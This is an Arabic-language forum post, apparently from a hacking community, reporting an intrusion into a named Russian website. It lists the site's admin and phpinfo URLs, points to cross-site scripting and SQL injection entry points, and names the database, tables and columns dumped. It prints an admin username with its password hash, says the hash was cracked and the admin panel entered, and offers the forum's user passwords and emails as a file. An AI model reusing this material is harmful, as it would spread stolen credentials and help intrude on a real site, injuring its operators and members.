عدد النقاط : 11
بسم الله الرحمن الرحيم السلام عليكم ورحمه الله وبركاته http://www.tristihii.ru/ Server: Apache http://www.tristihii.ru/phpinfo.php http://www.tristihii.ru/robots.txt http://www.tristihii.ru/feedback/admin/ http://www.tristihii.ru/forum3//adm(تم تعطيلها من قبل الموقع) http://www.tristihii.ru/forum3/ucp.php?mode=login ( دخول المنتدي الاعضاء) فكيت الباس المشفر ممكن دخول الادمن من هنا مثل الاعضاء ثغرات المصابة http://www.tristihii.ru/raspis/ind.p...)%3C/script%3E http://www.tristihii.ru/raspis/ind.p...w=1&school=all' تم استغلال الثغرت sql وستخراج المعلومات عدد الصفوف: 1040 المفيد القاعدة stihii38_club الجدول poll_user العمود username,userpass النتيجة admin:f5328997cd73821b7258bdfe81d87266 الباس المشفر بعد فكه تم الدخول ولكن http://www.tristihii.ru/feedback/admin/ ليس لها صلاحية كافية القاعدة stihii38_club الجدول forum3_users العمود username,username_clean,user_password,user_email,u ser_email_hash ملاحظة اذ ماضيفت العمود user_email_hash =82181265626 يطلع ماهو واضح؟؟؟ النتيجة يرفع لكم ملف txt فك الباسبورد المشفر دخل من هنا url]http://www.tristihii.ru/forum3/ucp.php?mode=login ركز على رقم [23] ممكن يكون دخول نفس الاعضاء فمان الرحمن تضامن مع الشعب السوري الحر